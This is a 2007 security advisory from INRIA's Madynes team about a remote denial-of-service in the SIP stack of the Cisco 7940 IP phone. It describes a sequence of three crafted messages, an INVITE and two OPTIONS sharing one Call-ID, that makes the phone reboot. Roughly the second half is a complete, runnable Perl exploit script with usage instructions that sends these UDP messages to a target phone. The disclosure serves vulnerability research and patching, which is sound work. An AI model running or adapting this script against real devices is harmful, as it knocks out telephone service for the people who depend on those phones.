MADYNES Security Advisory : stateful  SIP  remote DOS on  Cisco 7940

Date of Discovery 3 February, 2007

ID: KIPH5

Synopsis

After sending a series of three SIP messages the device reboots. The phone
does not check properly the state engine in the SIP stack
The vendor was informed  in March 2007 and acknowledged the vulnerability.
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first
vulnerabilities published where advanced state tracking is required.

Background 

*  SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session. 


Affected devices: Cisco phone 7940 (maybe other also) running firmware
P0S3-08-6-00 

 

Impact 
A malicious user can remotely crash and perform a denial of service attack
by sending three  crafted SIP  messages. 

Resolution
Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations. 

Credits

*  Humberto J. Abdelnur (Ph.D Student)
*  Radu State (Ph.D)
*  Olivier Festor (Ph.D)


This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH

 


Configuration of our device:

*  Current Firmware :  P0S3-08-6-00 
*  IP-Address obtained by DHCP as 192.168.1.8 
*  User Name: 7940-1

Vulnerability:

It is based in a sequence of messages, any of the particular messages may do
any harm by itself, but all of them turn the device in an inconsistent
state. The sequence is like:

X ------------------------- INVITE -----------------------> Cisco
X <--- 481 transaction does not exists -----  Cisco
X ------------------------- OPTIONS--------------------> Cisco
X <--------------------------- OK -------------------------  Cisco
X <--- 481 transaction does not exists -----  Cisco
X ------------------------- OPTIONS--------------------> Cisco

And the device reboots.

The INVITE sent has the particularity that the remote tag is already filled.
The following two OPTIONS messages must to have the same Call-ID as the
INVITE and the CSeq number must increment, otherwise the test does not work.


Exploit:

To run the exploit the file stateful-cisco-8.6.pl should be launched
(assuming our configurations) as:

perl stateful-cisco-8.6.pl 192.168.1.8 5060 7940-1

The script is simple and does not check if which messages are received, but
just wait a second before send the next one.

 

 

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia:
SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=00\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10
INVITE\r\nContent-Length: 0\r\n\r\n";;

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=01\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=01\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11
OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=02\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=02\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12
OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);